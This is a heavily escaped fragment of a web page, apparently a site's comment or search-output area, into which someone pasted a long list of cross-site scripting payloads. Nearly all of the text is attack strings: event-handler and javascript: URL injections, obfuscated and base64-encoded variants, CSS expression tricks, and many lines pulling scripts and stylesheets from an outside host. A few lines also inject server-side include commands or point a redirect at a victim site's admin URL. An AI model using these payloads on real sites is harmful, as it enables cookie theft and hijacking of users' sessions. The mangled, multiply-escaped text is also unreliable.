onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x21&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=\\\&#039;#\\\\x27 onerror=javascript:alert(1)&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x3Ajavascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a=\\\&#039;hello\\\\x27;javascript:alert(1)//\\\&#039;;&lt;/script&gt;&lt;/p&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x00cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x07cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Dcript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Acript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x08cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x02cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x03cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x04cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x01cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x05cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Bcript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x09cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x06cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Ccript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;script&gt;/* *\\\\x2A/javascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;script&gt;/* *\\\\x00/javascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;details open ontoggle=window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&gt;\\r\\n&lt;svg onload=window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;));&gt;\\r\\n&lt;marquee/onstart=window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&gt;\\r\\n&lt;svg onpointerenter=z=alert,z(document.domain)&gt;\\r\\n&lt;object data=javascript:window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&gt;\\r\\n&lt;/TITLE&gt;&lt;object/data=https://finickycold.htmlpasta.com&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;\\\&quot;\\r\\n&lt;svg onload=alert(1)&gt;\\r\\n&lt;input type=text autofocus onfocus=window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))//\\r\\n\\\&quot;&gt;&lt;svg onload=alert(1)&gt;\\r\\n&lt;/tag&gt;&lt;svg onload=alert(1)&gt;\\r\\n&lt;script qwerty&gt;window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&lt;/script qwerty&gt;\\r\\n&lt;image src\\\\r\\\\n=valid.jpg onloadend=\\\&#039;new class extends (co\\\\u006efir\\\\u006d)/**/`` &amp;lcub;&amp;rcub;\\\&#039;&gt;</code> <p>keyword(s): b</p> <p>description: : \\\\\\\');confirm&#40;1&#41;;//\\r\\n<x/ \\r\\n\\r\\n \\r\\n \\r\\n\\r\\n \\r\\n \\r\\n \\r\\n \\r\\n&lt;link/rel=prefetch import href=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg&gt;\\r\\n&lt;link rel=\\\"import\\\" href=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\'&gt;&lt;/object>\\r\\n&lt;svg \\\\r\\\\n=$.globalEval&#40;\\\"al\\\"+\\\"ert(&#41;\\\");&gt;\\r\\n?\\\">&lt;base c==href=https:\\\\mysite&gt;\\r\\n<dETAILS open x>\\r\\n<a >\\r\\n<Img >\\x="&gt;"</p> <p>by a | at 2021-08-19 09:41:50</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">\\r\\n\\r\\n\\r\\n\\r\\n \\r\\n\\r\\n\\r\\n>\\r\\n\\r\\n\\r\\n\\r\\n; alert&#40;1&#41;;\\r\\n)alert&#40;1&#41;;//\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG > \\r\\n<img >\\>\\r\\n\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/&gt;\\\'\\r\\n\\r\\n&lt;input/&gt;&lt;isindex &gt;\\>\\>\\\">\\/>\\r\\n\\r\\n&lt;svg&gt;\r\\n\\r\\n&lt;svg&gt;\\r\\n&lt;iframe src=)&gt;\\r\\n\\r\\n&lt;form&gt;<a >X\\r\\n\\r\\n<img/*/>\\r\\n<img/ &#11; >\\r\\n&lt;form&gt;&lt;iframe &#11; src=\\\"(1)\\\"&#11; ;&gt;\\r\\n\\r\\n<a >X</a\\r\\n\\r\\nhttp://www.googlealert)\r\\n\\r\\n&lt;a >XYZ</a\\r\\n\\r\\n&lt;img/>alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" &gt;\\r\\n\\r\\n&lt;form&gt;&lt;textarea &#13; &gt;\\r\\n\\r\\n\\r\\n\\r\\n<a >X</a>\\r\\n\\r\\n\\r\\n\\r\\n&lt;style/ &gt; alert &#40;1&#41;&gt;\\r\\n\\r\\n&lt;///style///&gt;<span / >SPAN\\r\\n\\r\\n<img/>&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/&gt;\\\'\\r\\n\\r\\n&#13;&lt;blink/&#13; &gt; {Firefox & Opera}\\r\\n\\r\\n<marquee >^__^\\r\\n\\r\\n<div/>X</div> {IE7}\\r\\n\\r\\n&lt;iframe// src=(1)\\r\\n\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/ /*iframe/src*/&gt;\\r\\n\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n\\r\\n</font>/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/&gt;\\\'</font>/&lt;/style&gt;\\r\\n\\r\\n<a/>&lt;input type=\\\"X\\\"&gt;\\r\\n\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n\\r\\n&lt;div &gt;DIV&lt;/div&gt;\\r\\n\\r\\n&lt;iframe &gt;\\r\\n\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n\\r\\n&lt;var &gt;On Mouse Over&lt;/var&gt;\\r\\n\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n\\r\\n&lt;img &gt;\\r\\n\\r\\n&lt;%&lt;!--\\\'%&gt;\\r\\n\\r\\n\\r\\n&lt;iframe/src \\\\/\\\\/ value=&lt;&gt;&lt;iframe/src=(1)\\r\\n\\r\\n&lt;input type=\\\"text\\\" value=`` &lt;div/&gt;X&lt;/div&gt;\\r\\n\\r\\nhttp://www.&lt;/iframe&gt;\\r\\n\\r\\n&lt;svg&gt;&lt;/iframe&gt;\\r\\n\\r\\n&lt;img &gt;\\/&gt;\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n\\r\\n&lt;embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;\\\"&gt;X&lt;/a\\r\\n\\r\\n&lt;iframe/ worksinIE&gt;\\r\\n\\r\\na=\\\a & /=/\\r\\n\r\\n\\r\\n&lt;object data=\\\alert&#40;1&#41;&gt;\\r\\n\\r\\n\\r\\n\\r\\n&lt;body/ alert&#40;1&#41;&gt;\\r\\n\\r\\n/*\\r\\n&lt;svg&gt; alert&#40;1&#41;\\r\\n\\r\\n&lt;a &gt;ClickMe\\r\\n\\r\\n alert&#40;1&#41; 1=2\\r\\n\\r\\n&lt;div/&gt; style=\\\"x:\\\"&gt;\\r\\n\\r\\n&lt;--`&lt;img/&gt; --!&gt;\\&gt;x&lt;/button&gt;\\r\\n\\r\\n\\\"&gt;&lt;img &gt;\\r\\n\\r\\n&lt;form&gt;&lt;button &gt;CLICKME\\r\\n\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n\\r\\n&lt;object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n\\r\\n&lt;iframe src=\\\PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;\\r\\n&lt;\\\"\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;&submit.x=27&submit.y=9&cmd=search\\r\\n&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\n&search=1\\r\\n0&q=\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert&#40;String.fromCharCode?(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;%?29//--&gt;\\\"&gt;\\\'&gt;&submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY worldss\\\')&gt;\\r\\n&lt;input autofocus&gt;\\r\\n&lt;input autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body &gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button &gt;lol\\r\\n&lt;!--&lt;img &gt;&lt;img &gt;\\r\\n&lt;![&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;style&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;? foo=\\\"&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;\\\"&gt;\\r\\n&lt;div ;color:red;\\\';\\\"&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n\\r\\n&lt;svg xmlns=\\\"http://www.w3.org/2000/svg\\\"&gt;LOL&lt;/svg&gt;\\r\\nalert&#40;/XSS/.source&#41;\\r\\n\\\\\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;;\\r\\n&lt;INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BODY =alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;IMG DYNSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;IMG LOWSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BGSOUND SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BR SIZE=\\\\\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\\\\\"&gt;\\r\\n&lt;LAYER SRC=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http://ha.ckers.org/xss.css\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\\\\\"http://ha.ckers.org/xssmoz.xml#xss\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"(xss.htc);\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;IMG SRC=\\\'(\\\\\\\"XSS\\\\\\\")\\\'&gt;\\r\\n&lt;IMG SRC=\\\\\\\"\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"\\\\\\\"&gt;\\r\\nscriptualert&#40;EXSSE&#41;/scriptu\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\"\\r\\n&lt;IFRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\"&gt;\\r\\n&lt;DIV STYLE=\\\\\\\"width: alert&#40;\\\'XSS\\\'&#41;);\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\\\\\"xss:expr/*XSS*/ession(alert&#40;\\\'XSS\\\'&#41;)\\\\\\\"&gt;\\r\\n&lt;XSS STYLE=\\\\\\\"xss:alert&#40;\\\'XSS\\\'&#41;)\\\\\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss:noxss(\\\\\\\"*//*\\\\\\\");\\r\\nxss:ex/*XSS*//*/*/pression(alert&#40;\\\\\\\"XSS\\\\\\\"&#41;)\\\'&gt;\\r\\n&lt;STYLE TYPE=\\\\\\\"text/javascript\\\\\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\\\\\"text/css\\\\\\\"&gt;BODY{background:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]&gt;\\r\\nalert&#40;\\\'XSS\\\'&#41;;\\r\\n&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\\\\\"(\\\'XSS\\\');//\\\\\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\\\\\"text/x-scriptlet\\\\\\\" DATA=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=(\\\'XSS\\\')&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\\\\\"http://ha.ckers.org/xss.swf\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\n&lt;EMBED SRC=\\\\\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\" type=\\\\\\\"image/svg+xml\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\\\\\"get\\\\\\\";\\r\\nb=\\\\\\\"URL(\\\\\\\\\\\"\\\\\\\";\\r\\nc=\\\\\\\"\\\\\\\";\\r\\nd=\\\\\\\"alert&#40;\\\'XSS\\\'&#41;;\\\\\\\\\\\")\\\\\\\";\\r\\neval&#40;a+b+c+d&#41;;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\\\\\"xss\\\\\\\" implementation=\\\\\\\"http://ha.ckers.org/xss.htc\\\\\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\\\\\\\"javas]]&gt;&lt;![CDATA[cript:alert&#40;\\\'XSS\\\'&#41;;\\\\\\\"&gt;]]&gt;\\r\\n&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;XML ID=\\\\\\\"xss\\\\\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\\\\\"javas&lt;!-- --&gt;cript:alert&#40;\\\'XSS\\\'&#41;\\\\\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=\\\\\\\"#xss\\\\\\\" DATAFLD=\\\\\\\"B\\\\\\\" DATAFORMATAS=\\\\\\\"HTML\\\\\\\"&gt;&lt;/SPAN&gt;\\r\\n&lt;XML SRC=\\\\\\\"xsstest.xml\\\\\\\" ID=I&gt;&lt;/XML&gt;\\r\\n&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;?xml:namespace prefix=\\\\\\\"t\\\\\\\" ns=\\\\\\\"urn:schemas-microsoft-com:time\\\\\\\"&gt;\\r\\n&lt;?import namespace=\\\\\\\"t\\\\\\\" implementation=\\\\\\\"#default#time2\\\\\\\"&gt;\\r\\n&lt;t:set attributeName=\\\\\\\"innerHTML\\\\\\\" to=\\\\\\\"XSS&lt;SCRIPT DEFER&gt;alert&#40;"XSS"&#41;\\\\\\\"&gt;\\r\\n&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT SRC=\\\\\\\"http://ha.ckers.org/xss.jpg\\\\\\\"&gt;\\r\\n&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'&lt;SCR\\\'\\\\\\\"--&gt;&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js&gt;\\\'\\\\\\\"--&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';\\r\\necho(\\\'IPT&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\'); ?&gt;\\r\\n&lt;IMG SRC=\\\\\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\\\\\"&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Set-Cookie\\\\\\\" Content=\\\\\\\"USERID=alert&#40;\\\'XSS\\\'&#41;\\\\\\\"&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\\\\\"CONTENT-TYPE\\\\\\\" CONTENT=\\\\\\\"text/html; charset=UTF-7\\\\\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT =\\\\\\\"&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\\\\\" \\\'\\\' SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT \\\\\\\"a=\\\'&gt;\\\'\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;SCRIPT a=\\\\\\\"&gt;\\\'&gt;\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n(\\\\\\\"&lt;SCRI\\\\\\\");PT SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;A HREF=\\\\\\\"http://66.102.7.147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://www.google.com\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://1113982867/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://0x42.0x0000066.0x7.0x93/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://0102.0146.0007.00000223/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"htt p://6 6.000146.0x7.147/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//www.google.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"//google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://ha.ckers.org@google\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://google:ha.ckers.org\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://google.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"http://www.google.com./\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\\\\\"\\\'http://www.google.com/\\\'\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A 